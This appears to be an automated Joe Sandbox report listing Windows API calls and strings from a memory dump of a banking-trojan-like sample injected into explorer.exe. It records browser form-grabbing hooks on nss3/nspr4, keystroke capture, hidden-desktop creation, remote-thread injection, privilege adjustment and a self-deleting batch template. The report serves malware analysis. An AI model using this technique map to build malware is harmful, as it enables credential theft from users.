Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 01B5EB38
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 01B5EB45
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 01B5EB52
Part of subcall function 01B5EA11: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 01B5EB5F
Part of subcall function 01B5EA11: FreeLibrary.KERNEL32(00000000), ref: 01B5EE9C
Part of subcall function 01B5EA11: FreeLibrary.KERNEL32(?), ref: 01B5EEA6
Part of subcall function 01B5EA11: FreeLibrary.KERNEL32(00000000), ref: 01B5EEB0

GetTickCount.KERNEL32(?,0000001E,000001F4), ref: 01B6AF9B

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

GetKeyboardState.USER32(?), ref: 01B6AFF3
ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 01B6B01B

Part of subcall function 01B6AD5F: EnterCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AD7C
Part of subcall function 01B6AD5F: LeaveCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AD9D
Part of subcall function 01B6AD5F: EnterCriticalSection.KERNEL32(01B73FB4,?,?,?,?,01B6B052,?), ref: 01B6ADAE
Part of subcall function 01B6AD5F: LeaveCriticalSection.KERNEL32(01B73FB4,?,?,?,01B6B052,?), ref: 01B6AE47

Strings

, xrefs: 01B6B039

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6C5CA, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 64

APIs

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 01B6C5ED
EnterCriticalSection.KERNEL32(01B7400C), ref: 01B6C620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 01B6C640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 01B6C64C

Part of subcall function 01B5C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,01B620A9), ref: 01B5C111
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,01B620A9), ref: 01B5C125
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 01B5C132
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 01B5C13F
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 01B5C14C

LeaveCriticalSection.KERNEL32(01B7400C), ref: 01B6C669

Strings

nss3.dll, xrefs: 01B6C646
nspr4.dll, xrefs: 01B6C63A

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B669AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(01B72C3C,00000001,00000000,01B622ED,?,?,00000000), ref: 01B669B4
SetSecurityDescriptorDacl.ADVAPI32(01B72C3C,00000001,00000000,00000000,?,?,00000000), ref: 01B669C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 01B669DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 01B669F7
SetSecurityDescriptorSacl.ADVAPI32(01B72C3C,?,?,?,?,?,00000000), ref: 01B66A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 01B66A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 01B669D6

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6B58C, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30

APIs

InitializeCriticalSection.KERNEL32(01B73FE4,76C61857,01B5C185,01B72360), ref: 01B6B5A2
GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 01B6B5DE
GetProcAddress.KERNEL32(PR_SetError), ref: 01B6B5F0
GetProcAddress.KERNEL32(PR_GetError), ref: 01B6B602

Strings

PR_SetError, xrefs: 01B6B5E0
PR_GetNameForIdentity, xrefs: 01B6B5BE
PR_GetError, xrefs: 01B6B5F2

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B57206, Relevance: 12.2, APIs: 8, Instructions: 180

APIs

Part of subcall function 01B66444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 01B66463
Part of subcall function 01B66444: freeaddrinfo.WS2_32(?,?,?,?,?,01B57284,?), ref: 01B664B0

GetCurrentThread.KERNEL32(00000001,?,00000003,?,?,00000000,?), ref: 01B572EB
SetThreadPriority.KERNEL32(00000000), ref: 01B572F2

Part of subcall function 01B6D865: OpenWindowStationW.USER32(?,00000000,10000000), ref: 01B6D88A
Part of subcall function 01B6D865: CreateWindowStationW.USER32(?,00000000,10000000,00000000), ref: 01B6D89D
Part of subcall function 01B6D865: GetProcessWindowStation.USER32 ref: 01B6D8AE
Part of subcall function 01B6D865: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 01B6D8E9
Part of subcall function 01B6D865: CreateDesktopW.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 01B6D8FD
Part of subcall function 01B6D865: GetCurrentThreadId.KERNEL32(?,?,?,01B5731A,?,2937498D,?,00000000), ref: 01B6D909
Part of subcall function 01B6D865: GetThreadDesktop.USER32(00000000), ref: 01B6D910
Part of subcall function 01B6D865: SetThreadDesktop.USER32(00000000), ref: 01B6D922
Part of subcall function 01B6D865: CloseDesktop.USER32(00000000), ref: 01B6D934
Part of subcall function 01B6D865: CloseWindowStation.USER32(?), ref: 01B6D94F

Part of subcall function 01B5DD09: TlsAlloc.KERNEL32(01B72868,00000000,0000018C,00000000,00000000), ref: 01B5DD22
Part of subcall function 01B5DD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 01B5DD4A
Part of subcall function 01B5DD09: CreateEventW.KERNEL32(01B72C30,00000001,00000000,?,84889912,?,00000001), ref: 01B5DD74
Part of subcall function 01B5DD09: CreateMutexW.KERNEL32(01B72C30,00000000,?,18782822,?,00000001), ref: 01B5DD97
Part of subcall function 01B5DD09: CreateFileMappingW.KERNEL32(00000000,01B72C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 01B5DDC2
Part of subcall function 01B5DD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 01B5DDD8
Part of subcall function 01B5DD09: GetDC.USER32(00000000), ref: 01B5DDF5
Part of subcall function 01B5DD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 01B5DE15
Part of subcall function 01B5DD09: GetDeviceCaps.GDI32(?,0000000A), ref: 01B5DE1F
Part of subcall function 01B5DD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 01B5DE32
Part of subcall function 01B5DD09: ReleaseDC.USER32(00000000,?), ref: 01B5DE56
Part of subcall function 01B5DD09: CreateMutexW.KERNEL32(01B72C30,00000000,?,1898B122,?,00000001,01B728B8,?,00000102,01B728A4,01B72E70,00000010,?,?), ref: 01B5DF00
Part of subcall function 01B5DD09: GetDC.USER32(00000000), ref: 01B5DF15
Part of subcall function 01B5DD09: CreateCompatibleDC.GDI32(00000000), ref: 01B5DF23
Part of subcall function 01B5DD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 01B5DF3A
Part of subcall function 01B5DD09: SelectObject.GDI32(00000000,00000000), ref: 01B5DF4D
Part of subcall function 01B5DD09: ReleaseDC.USER32(00000000,00000001), ref: 01B5DF65

GetShellWindow.USER32 ref: 01B57338
SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 01B5736B

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

WaitForSingleObject.KERNEL32(00000000,00001388), ref: 01B573CD
CloseHandle.KERNEL32(?), ref: 01B573DD
CloseHandle.KERNEL32(?), ref: 01B573E3
SystemParametersInfoW.USER32(00001003,00000000,00000000,00000000), ref: 01B573F2

Part of subcall function 01B5D4B4: WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,01B5E1F1,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 01B5D714
Part of subcall function 01B5D4B4: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01B5D72F
Part of subcall function 01B5D4B4: ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 01B5D7C1
Part of subcall function 01B5D4B4: GetSystemMetrics.USER32(00000017), ref: 01B5D8DB
Part of subcall function 01B5D4B4: ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 01B5DC67

Part of subcall function 01B5DF74: DeleteObject.GDI32(00000000), ref: 01B5DF87
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DF97
Part of subcall function 01B5DF74: TlsFree.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFA2
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DFB0
Part of subcall function 01B5DF74: UnmapViewOfFile.KERNEL32(00000000,00000000,01B72868,00000000,01B5E17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 01B5DFBA
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5DFC7
Part of subcall function 01B5DF74: SelectObject.GDI32(00000000,00000000), ref: 01B5DFE1
Part of subcall function 01B5DF74: DeleteObject.GDI32(00000000), ref: 01B5DFF2
Part of subcall function 01B5DF74: DeleteDC.GDI32(00000000), ref: 01B5DFFF
Part of subcall function 01B5DF74: CloseHandle.KERNEL32(00000000), ref: 01B5E010
Part of subcall function 01B5DF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B5E01F
Part of subcall function 01B5DF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 01B5E038

Part of subcall function 01B665B7: recv.WS2_32(?,?,00000400,00000000), ref: 01B66600
Part of subcall function 01B665B7: #19.WS2_32(?,?,00000000,00000000), ref: 01B6661A
Part of subcall function 01B665B7: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 01B66657

Part of subcall function 01B6675E: shutdown.WS2_32(?,00000002), ref: 01B66766
Part of subcall function 01B6675E: #3.WS2_32(?), ref: 01B6676D

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B667B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01B667CC

Part of subcall function 01B66774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 01B667A7

Part of subcall function 01B66403: socket.WS2_32(?,00000001,00000006), ref: 01B6640C
Part of subcall function 01B66403: connect.WS2_32(00000000,?,-0000001D), ref: 01B6642C
Part of subcall function 01B66403: #3.WS2_32(00000000), ref: 01B66437

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6A6AF, Relevance: 12.2, APIs: 8, Instructions: 165

APIs

Part of subcall function 01B6A594: HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 01B6A5F4

Part of subcall function 01B61049: EnterCriticalSection.KERNEL32(01B72AC8), ref: 01B61064
Part of subcall function 01B61049: LeaveCriticalSection.KERNEL32(01B72AC8), ref: 01B610E7
Part of subcall function 01B61049: InternetCrackUrlA.WININET(?,?,00000000,?), ref: 01B611B2
Part of subcall function 01B61049: InternetCrackUrlA.WININET(?,00000010,00000000,?), ref: 01B613EC

SetLastError.KERNEL32(00002F78), ref: 01B6A6F6
HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 01B6A762
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01B6A77E
HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 01B6A795
EnterCriticalSection.KERNEL32(01B73F24), ref: 01B6A79D
LeaveCriticalSection.KERNEL32(01B73F24,?), ref: 01B6A853

Part of subcall function 01B65048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 01B6506A
Part of subcall function 01B65048: InternetQueryOptionA.WININET(?,00000015,?,?), ref: 01B6508C
Part of subcall function 01B65048: InternetCloseHandle.WININET(?), ref: 01B65094

Part of subcall function 01B61C3C: CreateThread.KERNEL32(00000000,00000000,Function_00011A04,?,00000000,00000000), ref: 01B61C81
Part of subcall function 01B61C3C: CloseHandle.KERNEL32(?), ref: 01B61C9A

EnterCriticalSection.KERNEL32(01B73F24), ref: 01B6A87A
LeaveCriticalSection.KERNEL32(01B73F24,?), ref: 01B6A8BA

Part of subcall function 01B69C3C: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01B73F24,01B6A893,?), ref: 01B69CB1

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B631CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01B631ED
Process32FirstW.KERNEL32(000001E6,?), ref: 01B63216

Part of subcall function 01B6245B: CreateMutexW.KERNEL32(01B72C30,00000001,?,01B72E70,76C605D7,?,00000002,?,76C605D7), ref: 01B624A3
Part of subcall function 01B6245B: GetLastError.KERNEL32 ref: 01B624AF
Part of subcall function 01B6245B: CloseHandle.KERNEL32(00000000), ref: 01B624BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 01B63271
CloseHandle.KERNEL32(?), ref: 01B6330E

Part of subcall function 01B649D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,01B62326,000000FF,01B72C08,?,?,00000000), ref: 01B649E2
Part of subcall function 01B649D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,01B62326,000000FF,01B72C08), ref: 01B64A0E
Part of subcall function 01B649D2: CloseHandle.KERNEL32(?), ref: 01B64A23

CloseHandle.KERNEL32(00000000), ref: 01B6328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 01B632A1

Part of subcall function 01B63346: HeapAlloc.KERNEL32(00000008,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?,?), ref: 01B63368
Part of subcall function 01B63346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?), ref: 01B63379

Part of subcall function 01B63048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 01B63157
Part of subcall function 01B63048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-036D5903,00000000,00000000,00000000), ref: 01B63185
Part of subcall function 01B63048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 01B63198
Part of subcall function 01B63048: CloseHandle.KERNEL32(?), ref: 01B631A1
Part of subcall function 01B63048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 01B631B5
Part of subcall function 01B63048: CloseHandle.KERNEL32(00000000), ref: 01B631BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 01B6331A
CloseHandle.KERNEL32(000001E6), ref: 01B6332B

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5B11C, Relevance: 12.1, APIs: 8, Instructions: 107

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 01B5B130
ReleaseMutex.KERNEL32(?), ref: 01B5B14F
GetWindowRect.USER32(?,?), ref: 01B5B15C
IsRectEmpty.USER32(?), ref: 01B5B1E0
GetWindowLongW.USER32(?,000000F0), ref: 01B5B1EF
GetParent.USER32(?), ref: 01B5B205
MapWindowPoints.USER32(00000000,00000000), ref: 01B5B20E
SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 01B5B232

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B614C3, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367

APIs

Part of subcall function 01B6433F: CharLowerA.USER32(00000000), ref: 01B64420
Part of subcall function 01B6433F: CharLowerA.USER32(?), ref: 01B6442D

Part of subcall function 01B63346: HeapAlloc.KERNEL32(00000008,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?,?), ref: 01B63368
Part of subcall function 01B63346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,01B636F5,?,?,00000000,01B641E1,?,01B62070,?,?,?,01B64191,?,?), ref: 01B63379

Part of subcall function 01B67FE1: StrCmpNIA.SHLWAPI(00000001,nbsp;,00000005), ref: 01B68104

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

InternetCrackUrlA.WININET ref: 01B617AC
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 01B617CA

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

LeaveCriticalSection.KERNEL32(01B72AC8,?,?), ref: 01B6194D

Part of subcall function 01B64660: CryptAcquireContextW.ADVAPI32(01B68C87,00000000,00000000,00000001,F0000040,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B64679
Part of subcall function 01B64660: CryptCreateHash.ADVAPI32(01B68C87,00008003,00000000,00000000,00000030,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B64691
Part of subcall function 01B64660: CryptHashData.ADVAPI32(00000030,00000010,01B68C87,00000000,?,01B68C87), ref: 01B646AD
Part of subcall function 01B64660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,01B68C87), ref: 01B646C5
Part of subcall function 01B64660: CryptDestroyHash.ADVAPI32(00000030,?,01B68C87), ref: 01B646DC
Part of subcall function 01B64660: CryptReleaseContext.ADVAPI32(01B68C87,00000000,?,01B68C87,?,00000030,?,?,?,01B691A0,01B73EC0), ref: 01B646E6

GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?), ref: 01B618E4

Part of subcall function 01B6763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,01B69EAB,?,?,00000004), ref: 01B67658
Part of subcall function 01B6763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,01B69EAB,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67672
Part of subcall function 01B6763A: RegCloseKey.ADVAPI32(00000004,?,?,01B69EAB,?,?,00000004,?,00000004), ref: 01B67681

EnterCriticalSection.KERNEL32(01B72AC8), ref: 01B61910

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Strings

?*, xrefs: 01B614FD

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B68AE4, Relevance: 10.6, APIs: 7, Instructions: 109

APIs

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 01B68B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 01B68B4A

Part of subcall function 01B68AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 01B68B94
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 01B68BC1
Part of subcall function 01B68AE4: Sleep.KERNEL32(00000000,?,?), ref: 01B68BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 01B68C1F
FindClose.KERNEL32(?,?,?,?,00000000), ref: 01B68C31

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64E7B, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85

APIs

Part of subcall function 01B68737: GetTempPathW.KERNEL32(000000F6,?), ref: 01B6874E

CharToOemW.USER32(?,?), ref: 01B64EAB
GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 01B64F2F

Part of subcall function 01B68716: SetFileAttributesW.KERNEL32(00000080,00000080,01B6B4CD,?), ref: 01B6871F
Part of subcall function 01B68716: DeleteFileW.KERNEL32(?), ref: 01B68729

Part of subcall function 01B6856B: CreateFileW.KERNEL32(01B64E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 01B68585
Part of subcall function 01B6856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01B685A8
Part of subcall function 01B6856B: CloseHandle.KERNEL32(00000000), ref: 01B685B5

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

Strings

@echo off%sdel /F "%s", xrefs: 01B64EBE
bat, xrefs: 01B64E8B
/c "%s", xrefs: 01B64F01
ComSpec, xrefs: 01B64F2A

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B6795E, Relevance: 10.6, APIs: 7, Instructions: 65

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 01B6797D
PathAddBackslashW.SHLWAPI(?), ref: 01B67994
PathRemoveBackslashW.SHLWAPI(?), ref: 01B679A5
PathRemoveFileSpecW.SHLWAPI(?), ref: 01B679B2
PathAddBackslashW.SHLWAPI(?), ref: 01B679C3
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 01B679D2
CLSIDFromString.OLE32(?,?), ref: 01B679EC

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B678D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60

APIs

RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 01B678FD

Part of subcall function 01B6773A: CharUpperW.USER32(00000000), ref: 01B6785B

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 01B6792F
RegCloseKey.ADVAPI32(?), ref: 01B67938
RegCloseKey.ADVAPI32(?), ref: 01B67952

Strings

SOFTWARE\Microsoft, xrefs: 01B678F0
d, xrefs: 01B67943

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B64A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,01B6C9A1,00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,01B6C9A1,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64AB0
LookupPrivilegeValueW.ADVAPI32(00000000,01B6C9A1,?), ref: 01B64AD4
AdjustTokenPrivileges.ADVAPI32(01B6C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01B64AE9
GetLastError.KERNEL32 ref: 01B64AF3
CloseHandle.KERNEL32(01B6C9A1), ref: 01B64B02

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B66A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 01B64A87: GetCurrentThread.KERNEL32(00000020,00000000,01B6C9A1,00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A97
Part of subcall function 01B64A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64A9E
Part of subcall function 01B64A87: OpenProcessToken.ADVAPI32(000000FF,00000020,01B6C9A1,?,?,?,?,01B6C9A1,SeTcbPrivilege), ref: 01B64AB0
Part of subcall function 01B64A87: LookupPrivilegeValueW.ADVAPI32(00000000,01B6C9A1,?), ref: 01B64AD4
Part of subcall function 01B64A87: AdjustTokenPrivileges.ADVAPI32(01B6C9A1,00000000,00000001,00000000,00000000,00000000), ref: 01B64AE9
Part of subcall function 01B64A87: GetLastError.KERNEL32 ref: 01B64AF3
Part of subcall function 01B64A87: CloseHandle.KERNEL32(01B6C9A1), ref: 01B64B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 01B66A5B
GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 01B66A77
SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 01B66A8E
LocalFree.KERNEL32(?), ref: 01B66A9D

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 01B66A56
SeSecurityPrivilege, xrefs: 01B66A43

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5B31C, Relevance: 9.2, APIs: 6, Instructions: 197

APIs

GetAncestor.USER32(?,00000002), ref: 01B5B345
SendMessageTimeoutW.USER32(?,00000021,?,?,00000002,00000064,?), ref: 01B5B370
PostMessageW.USER32(?,00000020,?,00000000), ref: 01B5B3B2

Part of subcall function 01B5B23D: GetTickCount.KERNEL32 ref: 01B5B2A3
Part of subcall function 01B5B23D: GetClassLongW.USER32(?,000000E6), ref: 01B5B2D8

GetWindowThreadProcessId.USER32(?,00000000), ref: 01B5B448
PostMessageW.USER32(?,00000112,?,?), ref: 01B5B49B
GetWindowThreadProcessId.USER32(?,00000000), ref: 01B5B4DA

Part of subcall function 01B5B0AD: WaitForSingleObject.KERNEL32(?,000000FF), ref: 01B5B0B3
Part of subcall function 01B5B0AD: ReleaseMutex.KERNEL32(?), ref: 01B5B0E7
Part of subcall function 01B5B0AD: IsWindow.USER32(?), ref: 01B5B0EE
Part of subcall function 01B5B0AD: PostMessageW.USER32(?,00000215,00000000,?), ref: 01B5B108
Part of subcall function 01B5B0AD: SendMessageW.USER32(?,00000215,00000000,?), ref: 01B5B110

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B59694, Relevance: 9.2, APIs: 6, Instructions: 175

APIs

Part of subcall function 01B68C40: PathCombineW.SHLWAPI(01B61F45,01B61F45,?), ref: 01B68C5F

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 01B59709
StrStrIW.SHLWAPI(?,?), ref: 01B59796
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01B597BE
GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 01B597DB
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 01B5980C
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01B5982D

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

